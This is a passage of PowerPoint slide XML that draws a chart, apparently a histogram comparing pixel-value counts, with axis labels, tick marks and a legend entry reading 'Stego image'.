              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389594" y="5623478"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389594" y="1688983"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5272328" y="5776475"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782534" y="5623478"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782534" y="1688983"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6663885" y="5776475"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8170229" y="5623478"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8170229" y="1688983"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8055936" y="5776475"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="1688862"/>
            <a:ext cx="7124770" cy="4001549"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3595370" h="2019300">
                <a:moveTo>
                  <a:pt x="0" y="59"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="676" y="2018774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3594904" y="2018715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3594925" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737425" y="1604489"/>
            <a:ext cx="7032910" cy="864660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1258"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>30000</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6235270">
              <a:lnSpc>
                <a:spcPts val="1258"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stego</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="-188" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="99"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1288">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="25168">
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>25000</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7820673" y="1842922"/>
            <a:ext cx="368696" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="186054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="185916" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="43020">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7822849" y="1883627"/>
            <a:ext cx="367438" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="185420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="184942" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8189342" y="1798333"/>
            <a:ext cx="0" cy="85568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="43180">
                <a:moveTo>
                  <a:pt x="0" y="43042"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7822849" y="1798333"/>
            <a:ext cx="367438" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="185420">
                <a:moveTo>
                  <a:pt x="184942" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="object 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7822850" y="1798333"/>
            <a:ext cx="0" cy="85568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="43180">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="43042"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="object 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240944" y="5689672"/>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50" name="object 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240943" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268796" y="5689672"/>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52" name="object 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268795" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296702" y="5689945"/>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54" name="object 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324556" y="5689672"/>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55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324555" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352462" y="5689672"/>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57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352461" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379820" y="5689672"/>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59" name="object 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379819" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407674" y="5689945"/>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61" name="object 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435580" y="5689672"/>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62" name="object 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435579" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="object 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463486" y="5689672"/>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64" name="object 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463485" y="5689673"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="object 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1491338" y="5689414"/>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66" name="object 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1491337" y="5689126"/>
